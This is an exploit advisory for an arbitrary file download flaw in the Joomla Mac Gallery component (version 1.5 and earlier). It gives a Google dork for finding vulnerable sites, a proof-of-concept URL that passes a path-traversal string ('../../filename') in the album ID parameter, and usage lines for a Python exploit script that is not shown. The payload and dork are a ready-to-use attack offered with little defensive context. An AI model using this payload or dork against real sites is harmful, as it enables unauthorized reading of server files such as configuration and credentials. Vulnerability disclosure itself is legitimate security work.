######################
# Exploit Title : Joomla Mac Gallery <= 1.5 Arbitrary File Download
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://www.apptha.com
# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/18
# Dork Google: inurl:option=com_macgallery
# Date : 2014-09-17
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Info:
# Joomla Mac Gallery suffers from Arbitrary File Download vulnerability
# PoC Exploit:
# http://localhost/index.php?option=com_macgallery&view=download&albumid=[../../filename]
# "album_id" variable is not sanitized.
######################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
Download
Download Exploit: HERE
Exploit Usage
python j00ml4_mac_gallery_15_afd.py -t http[s]://localhost[:PORT]
python j00ml4_mac_gallery_15_afd.py -t http[s]://localhost/basedir[:PORT]